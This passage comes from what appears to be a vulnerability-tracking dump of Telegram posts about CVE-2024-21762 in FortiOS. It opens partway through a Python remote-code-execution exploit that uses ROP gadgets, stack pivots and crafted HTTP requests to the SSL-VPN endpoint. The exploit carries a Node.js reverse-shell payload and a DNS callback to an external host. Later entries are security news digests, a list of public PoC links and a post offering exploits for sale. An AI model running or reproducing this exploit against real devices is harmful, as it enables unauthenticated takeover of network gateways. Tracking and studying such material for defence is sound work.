b\"%00%00%00%00%00%00%00%00\" # r8\n\n    pivot_3 = b\"%e0%3f%4d%02%00%00%00%00\" # add rsp, 0xd90; pop rbx; pop r12; pop rbp; ret;\n\n    call_execl = b\"%80%c1%43%00%00%00%00%00\"\n\n    bin_node = b\"/bin/node%00\"\n    e_flag = b\"-e%00\"\n  ## use this one for rev shell   b'(function(){var net%3drequire(\"net\"),cp%3drequire(\"child_process\"),sh%3dcp.spawn(\"/bin/node\",[\"-i\"]);var client%3dnew net.Socket();client.connect(1337,\"xxxxxxxxxxx\",function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});return /a/;})();%00'\n    js_payload = b'(function(){var cp=require(\"child_process\");cp.execSync(\"nslookup xxxxxxxxxxx.oastify.com\");})();%00'\n\n    form_value  = b\"\"\n    form_value += b\"B\"*11 + bin_node + b\"B\"*6 + e_flag + b\"B\"*14 + js_payload\n    form_value += b\"B\"*438 + pivot_2 + getcwd_ptr\n    form_value += b\"B\"*32 + pivot_1\n    form_value += b\"B\"*168 + call_execl\n    form_value += b\"B\"*432 + ssl_do_handshake_ptr\n    form_value += b\"B\"*32 + rop + pivot_3\n    body = (b\"B\"*1808 + b\"=\" + form_value + b\"&\")*20\n\n    data  = b\"POST /remote/hostcheck_validate HTTP/1.1\\r\\n\"\n    data += b\"Host: \" + TARGET.encode() + b\"\\r\\n\"\n    data += b\"Content-Length: \" + str(len(body)).encode() + b\"\\r\\n\"\n    data += b\"\\r\\n\"\n    data += body\n\n    send_payload(data, TARGET, PORT)\n\n    # Short delay to ensure the server processes the first request\n    time.sleep(2)\n\n    # Preparing and sending the second part of the exploit\n    data  = b\"POST / HTTP/1.1\\r\\n\"\n    data += b\"Host: \" + TARGET.encode() + b\"\\r\\n\"\n    data += b\"Transfer-Encoding: chunked\\r\\n\"\n    data += b\"\\r\\n\"\n    data += b\"0\"*4137 + b\"\\0\"\n    data += b\"A\"*1 + b\"\\r\\n\\r\\n\"\n\n    send_payload(data, TARGET, PORT)\n\nif __name__ == \"__main__\":\n    main()\n\n\u041f\u043e\u0434\u0440\u043e\u0431\u043d\u044b\u0435 \u0440\u0435\u0441\u0435\u0440\u0447\u0438 \u043c\u043e\u0436\u0435\u0442\u0435 \u043d\u0430\u0439\u0442\u0438 \u0422\u0423\u0422, \u0422\u0423\u0422, \u0422\u0423\u0422\n\n\u0421\u043a\u0440\u0438\u043f\u0442 \u0434\u043b\u044f \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0438 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0432\u0430\u0448\u0435\u0433\u043e \u0441\u0435\u0440\u0432\u0435\u0440\u0430\nhttps://github.com/BishopFox/cve-2024-21762-check\n\ngit clone https://github.com/BishopFox/cve-2024-21762-check; cd cve-2024-21762-check; python3 check-cve-2024-21762.py  \n\n\n\ud83c\udf1a @poxek", "creation_timestamp": "2024-07-03T13:01:41.000000Z"}, {"uuid": "f6ac15cb-3f42-47d3-b4a7-79b3ebce4ab5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "seen", "source": "https://t.me/kasperskyb2b/1697", "content": "\ud83d\udc40 \u0418\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u0435 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f APT \u0438 \u043d\u043e\u0432\u043e\u0441\u0442\u0438 \u0418\u0411 \u0437\u0430 \u043d\u0435\u0434\u0435\u043b\u044e \n\n\u041e\u0447\u0435\u0440\u0435\u0434\u043d\u0430\u044f \u0432\u043e\u043b\u043d\u0430 \u0430\u0442\u0430\u043a APT GOFFEE \u043d\u0430 \u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u0438\u0435 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0446\u0435\u043b\u0435\u0432\u043e\u0439 \u0444\u0438\u0448\u0438\u043d\u0433, \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u044f\u044e\u0449\u0438\u0439 \u043d\u043e\u0432\u044b\u0439 \u0438\u043c\u043f\u043b\u0430\u043d\u0442 PowerModul, \u0430 \u0437\u0430\u0442\u0435\u043c \u0431\u0438\u043d\u0430\u0440\u043d\u044b\u0439 \u0430\u0433\u0435\u043d\u0442 Mythic \u043f\u0440\u0438 \u0433\u043e\u0440\u0438\u0437\u043e\u043d\u0442\u0430\u043b\u044c\u043d\u043e\u043c \u043f\u0435\u0440\u0435\u043c\u0435\u0449\u0435\u043d\u0438\u0438 \u043f\u043e \u0441\u0435\u0442\u0438.\n\nAPT MirrorFace \u043f\u0440\u0438\u043c\u0435\u043d\u044f\u0435\u0442 \u0432 \u0430\u0442\u0430\u043a\u0430\u0445 Windows Sandbox. \u041e\u043d\u0438 \u0430\u043a\u0442\u0438\u0432\u0438\u0440\u0443\u044e\u0442 \u044d\u0442\u0443 \u0444\u0443\u043d\u043a\u0446\u0438\u044e \u043d\u0430 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0435 \u0436\u0435\u0440\u0442\u0432\u044b, \u0430 \u0437\u0430\u0442\u0435\u043c \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u044e\u0442 \u0432 \u043f\u0435\u0441\u043e\u0447\u043d\u0438\u0446\u0435 \u0441\u0432\u043e\u0451 \u0412\u041f\u041e (Anel). \u0412 \u043f\u0435\u0441\u043e\u0447\u043d\u0438\u0446\u0435 \u043d\u0435 \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 Defender, \u043f\u0440\u0438 \u044d\u0442\u043e\u043c \u0432 \u0437\u0430\u0432\u0438\u0441\u0438\u043c\u043e\u0441\u0442\u0438 \u043e\u0442 \u043d\u0430\u0441\u0442\u0440\u043e\u0435\u043a \u043c\u043e\u0433\u0443\u0442 \u0431\u044b\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b \u0444\u0430\u0439\u043b\u044b \u0445\u043e\u0441\u0442\u0430, \u0431\u0443\u0444\u0435\u0440 \u043e\u0431\u043c\u0435\u043d\u0430, \u0438 \u043c\u043d\u043e\u0433\u043e\u0435 \u0434\u0440\u0443\u0433\u043e\u0435. \u0422\u0435\u0445\u043d\u0438\u043a\u0443, \u0432\u0435\u0440\u043e\u044f\u0442\u043d\u043e, \u0432\u043e\u0437\u044c\u043c\u0443\u0442 \u043d\u0430 \u0432\u043e\u043e\u0440\u0443\u0436\u0435\u043d\u0438\u0435 \u0438 \u0434\u0440\u0443\u0433\u0438\u0435 \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u0435.\n\n\u041d\u043e\u0432\u044b\u0435 \u0442\u0430\u043a\u0442\u0438\u043a\u0438 \u043e\u0431\u0445\u043e\u0434\u0430 \u0437\u0430\u0449\u0438\u0442\u044b \u0432 \u0430\u0442\u0430\u043a\u0430\u0445 APT ToddyCat. \n\nFortinet \u043e\u0442\u0447\u0438\u0442\u0430\u043b\u0438\u0441\u044c, \u0447\u0442\u043e \u0440\u0430\u043d\u0435\u0435 \u0432\u0437\u043b\u043e\u043c\u0430\u043d\u043d\u044b\u0435 FortiGate \u043c\u043e\u0433\u0443\u0442 \u0431\u044b\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u043c \u0432 \u0440\u0435\u0436\u0438\u043c\u0435 read only \u0434\u0430\u0436\u0435 \u043f\u043e\u0441\u043b\u0435 \u0442\u043e\u0433\u043e, \u043a\u0430\u043a \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0430. \u0422\u0435\u0445\u043d\u0438\u043a\u0430, \u043e\u0441\u043d\u043e\u0432\u0430\u043d\u043d\u0430\u044f \u043d\u0430 \u0440\u0430\u0437\u043c\u0435\u0449\u0435\u043d\u0438\u0438 \u0441\u0438\u043c\u0432\u043e\u043b\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u0441\u0441\u044b\u043b\u043e\u043a, \u043f\u0440\u0438\u043c\u0435\u043d\u0438\u043c\u0430 \u043a \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430\u043c, \u043d\u0430 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0431\u044b\u043b \u0432\u043a\u043b\u044e\u0447\u0451\u043d SSL-VPN \u0438 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u043b\u0438\u0441\u044c CVE-2022-42475, CVE-2023-27997, CVE-2024-21762 \u0438 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e \u0434\u0440\u0443\u0433\u0438\u0435 CVE.\n\nAPT Sidecopy \u0441\u043c\u0435\u043d\u0438\u043b\u0430 \u0441\u0432\u043e\u0438 \u0444\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u044b\u0435 \u0442\u0430\u043a\u0442\u0438\u043a\u0438 \u0438 \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u044f\u0435\u0442 \u0412\u041f\u041e \u0432 \u043f\u0430\u043a\u0435\u0442\u0430 MSI \u0432\u043c\u0435\u0441\u0442\u043e \u0438\u0437\u043b\u044e\u0431\u043b\u0435\u043d\u043d\u043e\u0433\u043e HTA.\n\n\u0420\u0430\u0437\u0431\u043e\u0440 \u0430\u0442\u0430\u043a APT-Q-2/Kimsuky \u043d\u0430 \u044e\u0436\u043d\u043e\u043a\u043e\u0440\u0435\u0439\u0441\u043a\u0438\u0435 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438.\n\n\u041a\u0440\u0430\u0442\u043a\u0438\u0439 \u043e\u0431\u0437\u043e\u0440 \u0438\u043d\u0446\u0438\u0434\u0435\u043d\u0442\u043e\u0432 \u0438\u043d\u0434\u0443\u0441\u0442\u0440\u0438\u0430\u043b\u044c\u043d\u043e\u0439 \u0418\u0411 \u0437\u0430 Q4/2024.\n\n\u0413\u043b\u0443\u0431\u043e\u043a\u0438\u0439 \u0440\u0430\u0437\u0431\u043e\u0440 \u0412\u041f\u041e \u0438 \u044d\u0432\u043e\u043b\u044e\u0446\u0438\u0438 HelloKitty ransomware.\n\n\u0421\u043f\u0443\u0441\u0442\u044f \u0432\u0441\u0435\u0433\u043e 4 \u0447\u0430\u0441\u0430 \u043f\u043e\u0441\u043b\u0435 \u043f\u0443\u0431\u043b\u0438\u043a\u0430\u0446\u0438\u0438 \u0434\u0430\u043d\u043d\u044b\u0445 \u043e \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u043f\u043b\u0430\u0433\u0438\u043d\u0435 WordPress OttoKit/Suretriggers \u0435\u0451 \u043d\u0430\u0447\u0430\u043b\u0438 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438.\n\n\u0415\u0449\u0451 \u043e\u0434\u0438\u043d \u043f\u0440\u0438\u043c\u0435\u0440 \u043f\u0440\u043e\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u043f\u0440\u0438\u043c\u0435\u043d\u0435\u043d\u0438\u044f LLM \u0432 \u0441\u043f\u0430\u043c\u0435 \u0438 SEO: Akirabot \u043f\u0440\u0438\u043c\u0435\u043d\u044f\u0435\u0442 API OpenAI \u0434\u043b\u044f \u043a\u043e\u043d\u0442\u0435\u043a\u0441\u0442\u043d\u043e\u0433\u043e \u0437\u0430\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u0444\u043e\u0440\u043c \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u043a\u0438, \u043e\u0431\u0440\u0430\u0449\u0435\u043d\u0438\u0439 \u0432 \u0447\u0430\u0442 \u0438 \u0434\u0440\u0443\u0433\u0438\u0445 \u043f\u043e\u0434\u043e\u0431\u043d\u044b\u0445 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u0432 \u0432\u0437\u0430\u0438\u043c\u043e\u0434\u0435\u0439\u0441\u0442\u0432\u0438\u044f \u0441 \u043f\u043e\u0441\u0435\u0442\u0438\u0442\u0435\u043b\u044f\u043c\u0438 \u0432\u0435\u0431-\u0441\u0430\u0439\u0442\u043e\u0432. \u0421\u0443\u0449\u0435\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0435 \u0443\u0441\u0438\u043b\u0438\u044f \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u044b \u0434\u043b\u044f \u043e\u0431\u0445\u043e\u0434\u0430 \u043a\u0430\u043f\u0447\u0438 \u0438 \u0434\u0440\u0443\u0433\u0438\u0445 \u0437\u0430\u0449\u0438\u0442\u043d\u044b\u0445 \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c\u043e\u0432.\n\n\u0418\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u0435 \u043d\u043e\u0432\u043e\u0441\u0442\u0438 \u0434\u043b\u044f \u043b\u044e\u0431\u0438\u0442\u0435\u043b\u0435\u0439 \u0432\u0430\u0439\u0431\u043a\u043e\u0434\u0438\u043d\u0433\u0430: 20% \u0418\u0418-\u043a\u043e\u0434\u0430 \u0441\u0441\u044b\u043b\u0430\u0435\u0442\u0441\u044f \u043d\u0430 \u043d\u0435\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u044e\u0449\u0438\u0435 \u0437\u0430\u0432\u0438\u0441\u0438\u043c\u043e\u0441\u0442\u0438. \u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u043e\u0436\u0438\u0434\u0430\u044e\u0442 \u043f\u043e\u044f\u0432\u043b\u0435\u043d\u0438\u044f \u0430\u0442\u0430\u043a slopsquatting \u2014 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0431\u0443\u0434\u0443\u0442 \u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u043f\u0430\u043a\u0435\u0442\u044b \u0441 \u043d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u0432\u0435\u0440\u043e\u044f\u0442\u043d\u044b\u043c\u0438 \u0438\u043c\u0435\u043d\u0430\u043c\u0438, \u043f\u043e \u0430\u043d\u0430\u043b\u043e\u0433\u0438\u0438 \u0441 typosquatting.\n\n\u041e\u0442\u043c\u0435\u0447\u0430\u0435\u0442\u0441\u044f \u0440\u043e\u0441\u0442 \u0430\u0442\u0430\u043a password spraying \u043f\u043e \u0432\u0441\u0435\u043c\u0443 \u043c\u0438\u0440\u0443 \u2014 \u043f\u043e\u0434 \u043f\u0440\u0438\u0446\u0435\u043b\u043e\u043c \u043b\u044e\u0431\u044b\u0435 \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0435 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u0431\u0435\u0437 MFA.\n\n#APT #\u0434\u0430\u0439\u0434\u0436\u0435\u0441\u0442 #\u043d\u043e\u0432\u043e\u0441\u0442\u0438 @\u041f2\u0422", "creation_timestamp": "2025-04-14T18:19:02.000000Z"}, {"uuid": "4d179ab3-663e-4bd4-b292-5f9b6d264c06", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "exploited", "source": "Telegram/lCIgEZ1sAcCOTxCNwV9STnFqh0hs-bU9Ci_SGVlnM-YSyQ", "content": "", "creation_timestamp": "2024-02-09T08:39:33.000000Z"}, {"uuid": "2653b0b1-d26b-49bd-a41b-2eb1e981d1c6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "seen", "source": "https://t.me/CyberBulletin/3012", "content": "\u26a1\ufe0fFortinet confirms attackers kept read-only access to FortiGate devices after patching old flaws (CVE-2022-42475, CVE-2023-27997, CVE-2024-21762) via hidden symlink in SSL-VPN.\n\n#CyberBulletin", "creation_timestamp": "2025-04-12T02:01:18.000000Z"}, {"uuid": "97232a53-2d44-465a-878c-5df85a6b2182", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "published-proof-of-concept", "source": "https://t.me/LockBitChannels/56148", "content": "#exploit\nCVE-2024-20328:\nClamAV Command Injection Bug\nhttps://amitschendel.github.io/vulnerabilites/CVE-2024-20328\n\nCVE-2024-24816:\nCKEditor XSS vulnerability\nhttps://github.com/afine-com/CVE-2024-24816\n\nCVE-2023-35080:\nIvanti/Pulse VPN Client Exploit\nhttps://github.com/HopHouse/Ivanti-Pulse_VPN-Client_Exploit-CVE-2023-35080_Privilege-escalation\n\nCVE-2024-0811:\nChrome pageCapture.saveAsMHTML() Extension API Blocked Origin Bypass\nhttps://packetstormsecurity.com/files/177172/Chrome-chrome.pageCapture.saveAsMHTML-Extension-API-Blocked-Origin-Bypass.html\n\nCVE-2023-50387:\nKeyTrap in DNS/DNSSEC\nhttps://github.com/knqyf263/CVE-2023-50387\n\nCVE-2024-22369:\nApache Camel Unsafe Deserialization\nhttps://github.com/oscerd/CVE-2024-22369\n\nCVE-2024-1708/CVE-2024-1709:\nScreenConnect Authentication Bypass\nhttps://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass\n\nCCE-2024-21413:\nMicrosoft Outlook RCE\nhttps://github.com/Mdusmandasthaheer/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability\n\nCVE-2024-24401:\nNagios Authenticated SQL Injection\nhttps://github.com/MAWK0235/CVE-2024-24401\n\nCVE-2024-1071:\nWordPress Ultimate Member Unauthorized Database Access/SQLi\nhttps://github.com/gbrsh/CVE-2024-1071\n\nCVE-2024-1651:\nTorrentpier RCE Exploit\nhttps://github.com/sharpicx/CVE-2024-1651-PoC\n\nCVE-2023-50386:\nApache Solr Backup/Restore APIs RCE\nhttps://github.com/vvmdx/Apache-Solr-RCE_CVE-2023-50386_POC\n\nCVE-2024-21762:\nFortiOS 6.0 - 7.4 - OoB/RCE\nhttps://github.com/c0d3b3af/CVE-2024-21762-POC\n\nCVE-2024-26521:\nCE Phoenix v1.0.x Html Injection\nhttps://github.com/hackervegas001/CVE-2024-26521\n\nCVE-2024-21672:\nConfluence Data Center/ Server RCE\nhttps://github.com/swagcrafted/CVE-2024-21672-POC\n\nCVE-2023-49109:\nRCE in Apache Dolphinscheduler\nhttps://xz.aliyun.com/t/13913?time__1311=mqmxnQ0%3D3eqQqGNDQiFbFD9Q7fCKAKx\n\nCVE-2024-21410:\nMS Exchange Privilege Escalation\nhttps://github.com/FreakyM0ndy/CVE-2024-21410-poc", "creation_timestamp": "2024-10-04T00:51:54.000000Z"}, {"uuid": "efcf88b3-eb7b-4b22-bc17-b8e06d09abd4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "seen", "source": "https://t.me/ViralCyber/12392", "content": "\ud83d\udd34\u0633\u0647\u0645 127 \u062a\u0627\u06cc\u06cc \u0627\u06cc\u0631\u0627\u0646 \u0627\u0632 17000 \u062f\u0633\u062a\u06af\u0627\u0647 Fotinet \u0642\u0631\u0628\u0627\u0646\u06cc \u0634\u062f\u0647 \u062f\u0631 \u062f\u0646\u06cc\u0627 \u062f\u0631 \u06cc\u06a9 \u0647\u0641\u062a\u0647 \u0627\u062e\u06cc\u0631!\n\u203c\ufe0f\u067e\u06cc\u0631\u0648 \u0627\u06cc\u0646 \u062e\u0628\u0631\u060c \u0645\u062a\u0627\u0633\u0641\u0627\u0646\u0647 17000 \u062f\u0633\u062a\u06af\u0627\u0647 Fortinet \u062f\u0631 \u062f\u0646\u06cc\u0627 \u0628\u0647 \u062f\u0644\u06cc\u0644 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631 \u0628\u0648\u062f\u0646 \u0628\u0647 \u06cc\u06a9 \u062f\u0631\u0628\u200c\u067e\u0634\u062a\u06cc \u0627\u0632 \u0646\u0648\u0639 Symlink \u0622\u0644\u0648\u062f\u0647 \u0634\u062f\u0647\u200c\u0627\u0646\u062f \u0628\u0637\u0648\u0631\u06cc\u06a9\u0647 \u0628\u0639\u062f \u0627\u0632 Patch \u06a9\u0631\u062f\u0646 \u0633\u06cc\u0633\u062a\u0645 \u0628\u0627\u0632 \u0647\u0645 \u062f\u0633\u062a\u0631\u0633\u06cc \u0647\u06a9\u0631\u0647\u0627 \u0628\u0627\u0632 \u0645\u06cc \u0645\u0627\u0646\u062f.\n\u25c0\ufe0f\u0628\u0631 \u0627\u0633\u0627\u0633 \u0622\u0645\u0627\u0631 ShadowServer \u062d\u062f\u0627\u0642\u0644 \u062a\u0639\u062f\u0627\u062f 127  \u062f\u0633\u062a\u06af\u0627\u0647 \u0627\u0632 \u0627\u06cc\u0646 \u0642\u0631\u0628\u0627\u0646\u06cc\u0627\u0646 \u062f\u0631 \u0627\u06cc\u0631\u0627\u0646 \u0628\u0648\u062f\u0647 \u0648 \u0647\u0645 \u0627\u06a9\u0646\u0648\u0646 \u0622\u0644\u0648\u062f\u0647 \u0628\u0647 Backdoor \u0647\u0633\u062a\u0646\u062f. \n\u0627\u06cc\u0646 Backdoor \u0627\u0632 \u0646\u0648\u0639 Symlink \u0627\u0633\u062a \u06a9\u0647 \u0628\u0647 \u0645\u0647\u0627\u062c\u0645\u0627\u0646 \u0627\u062c\u0627\u0632\u0647 \u0645\u06cc\u200c\u062f\u0647\u062f \u062d\u062a\u06cc \u067e\u0633 \u0627\u0632 \u0627\u0639\u0645\u0627\u0644 \u0648\u0635\u0644\u0647\u200c\u0647\u0627\u060c \u0628\u0647 \u0635\u0648\u0631\u062a Read-only \u0628\u0647 \u0641\u0627\u06cc\u0644\u200c\u0647\u0627\u06cc \u062d\u0633\u0627\u0633 \u0645\u0627\u0646\u0646\u062f \u062a\u0646\u0638\u06cc\u0645\u0627\u062a \u0633\u06cc\u0633\u062a\u0645 \u062f\u0633\u062a\u0631\u0633\u06cc \u062f\u0627\u0634\u062a\u0647 \u0628\u0627\u0634\u0646\u062f.\n\ud83e\udda0 \u0631\u06cc\u0634\u0647 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc:\n\u0627\u06cc\u0646 \u062f\u0631\u0628\u200c\u067e\u0634\u062a\u06cc \u062f\u0631 \u0627\u0631\u062a\u0628\u0627\u0637 \u0628\u0627 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc\u0647\u0627\u06cc \u0633\u0627\u0644\u200c\u0647\u0627\u06cc \u06f2\u06f0\u06f2\u06f3 \u062a\u0627 \u06f2\u06f0\u06f2\u06f4 \u0628\u0648\u062f\u0647 \u0648 \u0628\u0627 \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc\u200c\u0647\u0627\u06cc\u06cc \u0645\u0627\u0646\u0646\u062f CVE-2022-4247 \u0648 CVE-2023-27997 \u0648 CVE-2024-21762 \u0639\u0645\u0644 \u0645\u06cc\u200c\u06a9\u0646\u062f. \u0645\u0647\u0627\u062c\u0645\u0627\u0646 \u0628\u0627 \u0627\u06cc\u062c\u0627\u062f \u06cc\u06a9 Symlink \u0645\u062e\u0631\u0628 \u062f\u0631 \u067e\u0648\u0634\u0647 SSL-VPN\u060c \u0641\u0627\u06cc\u0644\u200c\u0633\u06cc\u0633\u062a\u0645 \u06a9\u0627\u0631\u0628\u0631 \u0631\u0627 \u0628\u0647 \u0641\u0627\u06cc\u0644\u200c\u0633\u06cc\u0633\u062a\u0645 root \u0645\u062a\u0635\u0644 \u0645\u06cc\u200c\u06a9\u0646\u0646\u062f.\n\n\ud83d\udee1 \u067e\u0627\u0633\u062e Fortinet:\n\u0628\u0647\u200c\u0631\u0648\u0632\u0631\u0633\u0627\u0646\u06cc\u200c\u0647\u0627\u06cc \u062c\u062f\u06cc\u062f FortiOS \u0634\u0627\u0645\u0644 \u0646\u0633\u062e\u0647\u200c\u0647\u0627\u06cc 7.6.2\u060c 7.4.7\u060c 7.2.11\u060c 7.0.17 \u0648 6.4.16 \u062f\u0627\u0631\u0627\u06cc \u0627\u0645\u0636\u0627\u06cc \u0622\u0646\u062a\u06cc\u200c\u0648\u06cc\u0631\u0648\u0633 \u0628\u0631\u0627\u06cc \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0648 \u062d\u0630\u0641 Symlink \u0645\u062e\u0631\u0628 \u0647\u0633\u062a\u0646\u062f. Fortinet \u0647\u0645\u0686\u0646\u06cc\u0646 \u0628\u0647 \u06a9\u0627\u0631\u0628\u0631\u0627\u0646 \u0622\u0633\u06cc\u0628\u200c\u062f\u06cc\u062f\u0647 \u0627\u0637\u0644\u0627\u0639\u200c\u0631\u0633\u0627\u0646\u06cc \u06a9\u0631\u062f\u0647 \u0648 \u062a\u0648\u0635\u06cc\u0647 \u0645\u06cc\u200c\u06a9\u0646\u062f \u0631\u0645\u0632\u0647\u0627\u06cc \u0639\u0628\u0648\u0631 \u0648 \u0627\u0637\u0644\u0627\u0639\u0627\u062a \u062d\u0633\u0627\u0633 \u062e\u0648\u062f \u0631\u0627 \u062a\u063a\u06cc\u06cc\u0631 \u062f\u0647\u0646\u062f.\n\n\u26a0\ufe0f \u0644\u0632\u0648\u0645 \u0627\u0642\u062f\u0627\u0645 \u0641\u0648\u0631\u06cc:\n\u0622\u0698\u0627\u0646\u0633\u200c\u0647\u0627\u06cc \u0627\u0645\u0646\u06cc\u062a\u06cc \u0645\u0627\u0646\u0646\u062f CISA \u062a\u0648\u0635\u06cc\u0647 \u06a9\u0631\u062f\u0647\u200c\u0627\u0646\u062f \u062a\u0627 \u0632\u0645\u0627\u0646 \u0646\u0635\u0628 \u0648\u0635\u0644\u0647\u200c\u0647\u0627\u060c \u0642\u0627\u0628\u0644\u06cc\u062a SSL-VPN \u063a\u06cc\u0631\u0641\u0639\u0627\u0644 \u0634\u0648\u062f. \u0632\u06cc\u0631\u0627 \u0648\u062c\u0648\u062f \u0627\u06cc\u0646 Backdoor \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u0628\u0647 \u0627\u0641\u0634\u0627\u06cc \u0631\u0645\u0632\u0647\u0627\u06cc \u0639\u0628\u0648\u0631 \u0648 \u06a9\u0644\u06cc\u062f\u0647\u0627\u06cc \u0631\u0645\u0632\u0646\u06af\u0627\u0631\u06cc \u0645\u0646\u062c\u0631 \u0634\u0648\u062f!\n\n\u2709\ufe0f@PingChannel\n\u062e\u0628\u0631\u060c \u062a\u062d\u0644\u06cc\u0644\u060c \u0627\u0646\u062a\u0642\u0627\u062f - \u0641\u0646\u0627\u0648\u0631\u06cc \u0627\u0637\u0644\u0627\u0639\u0627\u062a\n\ud83d\udd2b\ud83d\udd2b\ud83d\udd2b\ud83d\udd2b", "creation_timestamp": "2025-04-18T14:08:24.000000Z"}, {"uuid": "e69054b8-a940-4fce-b6af-94de654dfd5d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "seen", "source": "https://t.me/Hunt3rkill3rs1/53", "content": "\u041c\u044b \u043f\u0440\u043e\u0434\u0430\u0435\u043c \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0435 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u044b:\n\n+ Windows LPE (CVE-2024-26169), March 2024\n\n+ Microsoft Outlook RCE (CVE-2024-21413) - private and upgraded version (added suport for unauthenticated SMTP servers)\n\n+ GlobalProtect RCE (CVE-2024-3400)\n\n+ Fortinet FortiOS RCE (CVE-2024-21762)\n\n+ ScreenConnect RCE (CVE-2024-1709)\n\n+ Ivanti Exploit (CVE-2024-21893)\n\n+ Jenkins Exploit (CVE-2024-23897)\n\n+ JetBrains RCE (CVE-2024-27198)", "creation_timestamp": "2024-05-02T02:29:37.000000Z"}, {"uuid": "a1247e32-da2b-4e63-ae4e-f0af88d7867c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "published-proof-of-concept", "source": "https://t.me/BleepingComputer/19585", "content": "\u200aCritical Fortinet flaw may impact 150,000 exposed devices\n\nScans on the public web show that approximately 150,000 Fortinet FortiOS and FortiProxy secure web gateway systems are vulnerable to CVE-2024-21762, a critical security issue that allows executing code without authentication. [...]\n\nhttps://www.bleepingcomputer.com/news/security/critical-fortinet-flaw-may-impact-150-000-exposed-devices/", "creation_timestamp": 